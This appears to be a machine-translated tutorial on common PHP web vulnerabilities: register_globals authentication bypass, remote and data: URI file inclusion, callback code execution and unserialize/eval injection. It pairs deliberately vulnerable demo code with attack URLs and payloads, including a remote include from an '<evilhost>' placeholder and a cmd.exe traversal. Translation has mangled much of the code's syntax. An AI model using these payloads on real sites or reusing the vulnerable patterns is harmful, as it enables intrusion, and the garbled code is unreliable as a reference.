Common PHP vulnerability code analysis

Opening remarks:

PHP is short for Hypertext Preprocessor. PHP is an embedded HTML language. It is a scripting language that executes HTML documents embedded on the server. The language style is similar to the C language, in addition, PHP's unique syntax is a mixture of C, Java, Perl, and PHP's own syntax. PHP can execute dynamic web pages more quickly than CGI or Perl. Compared with other programming languages, PHP embeds programs into HTML documents for execution. The execution efficiency is much higher than the CGI that generates HTML tags completely; PHP can also execute the compiled code, which can encrypt and optimize code execution to make code run faster. PHP has very powerful functions, all CGI functions can be implemented by PHP, and supports almost all popular databases and operating systems. Most importantly, PHP can be expanded with C and C ++!

Moreover, PHP is a widely used scripting language, especially suitable for web development. It features cross-platform, easy to learn, and powerful functions. According to statistics, more than 34% of websites around the world have php applications... Including baidu, soso, sina, 163, sohu and other large portal websites. In addition, many named web application systems (including Discuz, phpwind, phpbb, vbb, wordpress, and boblog) are developed using php. With the upgrade of web security hot spots, php security problems are gradually emerging, and more security personnel are investing in this field. As more and more application code vulnerabilities are exposed, many official applications have set up the security department. That is, the situation has led to a situation where the product security factor of large companies is greatly improved, and the obvious vulnerabilities are basically extinct! We are faced with a lot of tools and code that Daniel has scanned for n times, and many people think that the website is "safe...

This article introduces some common vulnerabilities to share with you. (Too much nonsense. Thank you !)

In addition, I would like to explain here that many of the vulnerabilities in the spam are shared by Daniel and friends. I would like to say thank you to them at the Bisec Forum!

Body:
Global Variables

Variables in PHP do not need to be declared in advance. They are automatically created during the first use and their types are automatically determined according to the context. From the programmer's point of view, this is undoubtedly an extremely convenient processing method. Once a variable is created, it can be used anywhere in the program. The result of this feature is that programmers seldom initialize variables. The result of this feature is that programmers seldom initialize variables. After all, they are empty when they are created for the first time.
Obviously, the main functions of PHP-based applications generally accept user input (mainly form variables, upload files and cookies), and then process the input data, then return the result to the client browser. To make PHP code as easy as possible to access user input, PHP treats the input data as a global variable.

For example:
<Form method = "GET" ACTION = "test. php">
<Input type = "TEXT" NAME = "hello">
<Input type = "SUBMIT">
</FORM>
This displays a text box and the submit button. When a user clicks the submit button, "test. php" processes user input. When "test. php" is run, "$ hello" contains user input data in the text box. We can see from this that attackers can create arbitrary global variables as they wish. If an attacker does not use form input to call "test. php", he directly enters http: // 127.0.0.1/test. php In the browser address bar? Hello = hi & setup = no. Then, not only "$ hello" is created, but "$ setup" is also created.

The following user authentication code exposes the security issues caused by the global variables of PHP:
PHP code

1. <? Php
2. if ($ pass = "hello ")
3. $ auth = 1;
4 ....
5. if ($ auth = 1)
6. echo "some important information ";
7.?>

The above code first checks whether the user's password is "hello". If yes, set "$ auth" to "1" to pass authentication. If "$ suth" is "1", some important information will be displayed.

This Code assumes that "$ auth" is empty when no value is set, but an attacker can create any global variable and assign a value, using a command similar to "http: // 127.0.0.1/test. php? Auth = 1 "method. We can fool this code to believe that we have already authenticated it.

Therefore, to improve the security of PHP programs, we cannot trust any variables that are not clearly defined. If there are many variables in the program, this is a very difficult task.

A common protection method is to check the variables in the array HTTP_GET [] or POST_VARS [], which depends on our submission method (GET or POST ). When PHP is configured to enable the "track_vars" option (this is the default value), the variables submitted by the user can be obtained in the global variables and the array mentioned above.

However, it is worth noting that PHP has four different array variables used to process user input. The HTTP_GET_VARS array is used to process the variables submitted by the get method. The HTTP_POST_VARS array is used to process the variables submitted by the post method. The HTTP_COOKIE_VARS array is used to process the variables submitted as cookie headers, for the HTTP_POST_FILES array (provided by newer PHP), it is completely an optional method for users to submit variables. A user request can easily store variables in these four arrays. Therefore, a safe PHP program should check these four arrays.

Remote File

PHP is a language with rich features and provides a large number of functions, making it easy for programmers to implement a function. But from the security point of view, the more features, the more difficult it is to ensure its security. remote files are a good example of this problem:

<? Php
If (! ($ Fd = fopen ("$ filename", "r "))
Echo ("cocould not open file: $ filename <BR> n ");
?>

The above script tries to open the file "$ filename". If it fails, an error message is displayed. Obviously, if we can specify "$ filename", we can use this script to browse any files in the system. However, this script also has a less obvious feature, that is, it can read files from any other WEB or FTP site. In fact, most PHP file processing functions are transparent to remote file processing.

For example:

If you specify "$ filename" as "http: // 127.0.0.1/scripts/... % c1 % 1c ../winnt/system32/cmd.exe? /C + dir"
The above Code actually uses the unicode vulnerability on the target host to execute the dir command.

This makes the include (), require (), include_once () and require_once () Support for remote files more interesting in the context. The main functions of these functions include the content of the specified file, and they are interpreted according to the PHP code, mainly used on the library file.

For example:

<? Php
Include ($ libdir. "/ages. php ");
?>

In the above example, "$ libdir" is generally a path that has been set before code execution. If an attacker can make "$ libdir" not set, then he can change the path. However, attackers cannot do anything, because they can only access the file ages. php In the path they specify (the "Poison null byte" attack in perl does not work for PHP ). However, with support for remote files, attackers can do anything. For example, attackers can put a file named ages. php on a server, which contains the following content:

<? Php
Passthru ("/bin/ls/etc ");
?>

Then, set "$ libdir" to "http: // <evilhost>/", so that we can execute the above attack code on the target host, the content of the "/etc" directory is returned to the client's browser as a result.

File Inclusion code injection

File contains code injection of functions under specific conditions, such as include (), include_once (), require (), and require_once ().

When allow_url_include = On and PHP Version> = 5.2.0, code injection occurs.

Demo code 2.1:

<? Php
Include ($ _ GET ['a']);
?>

Access http: // 127.0.0.1/include. php? A = data: text/plain, % 3C? Php % 20 phpinfo % 28% 29 ;? % 3E:
Run phpinfo ().

Code execution of the ob_start () function

Demo code 5.1:
<Pre lang = "php" file = "demo51.php" colla = "+">
<? Php
$ Foobar = 'system ';
Ob_start ($ foobar );
Echo 'dir ';
Ob_end_flush ();
?>
</Pre>
5.2 code execution of the array_map () function

Demo code 5.2:

<Pre lang = "php" file = "demo52.php" colla = "+">
<? Php
$ Evil_callback = $ _ GET ['callback'];
$ Some_array = array (0, 1, 2, 3 );
$ New_array = array_map ($ evil_callback, $ some_array );
?>
</Pre>
We submit and execute phpinfo ().

 

Unserialize () and eval ()

Unserialize () is a function with high usage in PHP. Improper use of unserialize () may cause security risks.
(Black brother that challenge 2 http://hi.baidu.com/hi_heige/blog/item/505b2828da5b18f499250a9b.html)

Demo code 5.3:

<Pre lang = "php" file = "demo53.php" colla = "+">
<? Php
Class Example {
Var $ var = ";
Function _ destruct (){
Eval ($ this-> var );
}
}
Unserialize ($ _ GET ['saved _ Code']);
?>
</Pre>
We submit {s: 3: % 22var % 22; s: 10: % 22 phpinfo % 28% 29; % 22;} to execute phpinfo ().

Functions that may easily cause security problems

There are many functions of the same type
Array_map ()
Usort (), uasort (), uksort ()
Array_filter ()
Array_reduce ()
Array_diff_uassoc (), array_diff_ukey ()
Array_udiff (), array_udiff_assoc (), array_udiff_uassoc ()
Array_intersect_assoc (), array_intersect_uassoc ()
Array_uintersect (), array_uintersect_assoc (), array_uintersect_uassoc ()
Array_walk (), array_pai_recursive ()
Xml_set_character_data_handler ()
Xml_set_default_handler ()
Xml_set_element_handler ()
Xml_set_end_namespace_decl_handler ()
Xml_set_external_entity_ref_handler ()
Xml_set_notation_decl_handler ()
Xml_set_processing_instruction_handler ()
Xml_set_start_namespace_decl_handler ()
Xml_set_unparsed_entity_decl_handler ()
Stream_filter_register ()
Set_error_handler ()
Register_shutdown_function ()
Register_tick_function ()

(To be continued)